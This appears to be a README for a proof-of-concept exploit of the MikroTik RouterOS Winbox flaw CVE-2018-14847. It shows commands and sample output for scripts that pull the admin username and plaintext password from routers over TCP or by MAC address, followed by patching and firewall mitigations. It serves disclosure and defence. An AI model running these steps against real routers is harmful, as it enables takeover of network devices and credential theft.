Proof of Concept of RouterOS v6.42 Critical Vulnerability - CVE-2018-14847.
https://www.exploit-db.com/exploits/45170
https://blog.mikrotik.com/security/new-exploit-for-mikrotik-router-winbox-vulnerability.html
Winbox (TCP/IP)
python mikrotik_exploit.py 192.168.88.1
# Connected to 192.168.88.1:8291
# Exploit successful
# User: admin
# Pass: Th3P4ssWord
MAC server Winbox (Layer 2)
You can extract files even if the device doesn't have an IP address :-)
python mac_server_discover.py
# Looking for Mikrotik devices (MAC servers)
# 192.168.88.1 --> aa:bb:cc:dd:ee:ff
# 192.168.88.2 --> aa:bb:cc:dd:ee:aa
python mac_server_exploit.py aa:bb:cc:dd:ee:ff
# Connected to aa:bb:cc:dd:ee:ff
# Exploit successful
# User: admin
# Pass: Th3P4ssWord
All versions from 6.29 (release date: 2015/28/05) to 6.42 (release date 2018/04/20) are vulnerable.
- Update your RouterOS to the last version or Bugfix version.
- Do not use Winbox and disable it's nothing just a GUI for NooBs.
- You may use some Filter Rules (ACL) to deny anonymous accesses to the Router.
/ip firewall filter add chain=input in-interface=wan protocol=tcp dst-port=8291 action=drop
Enjoy!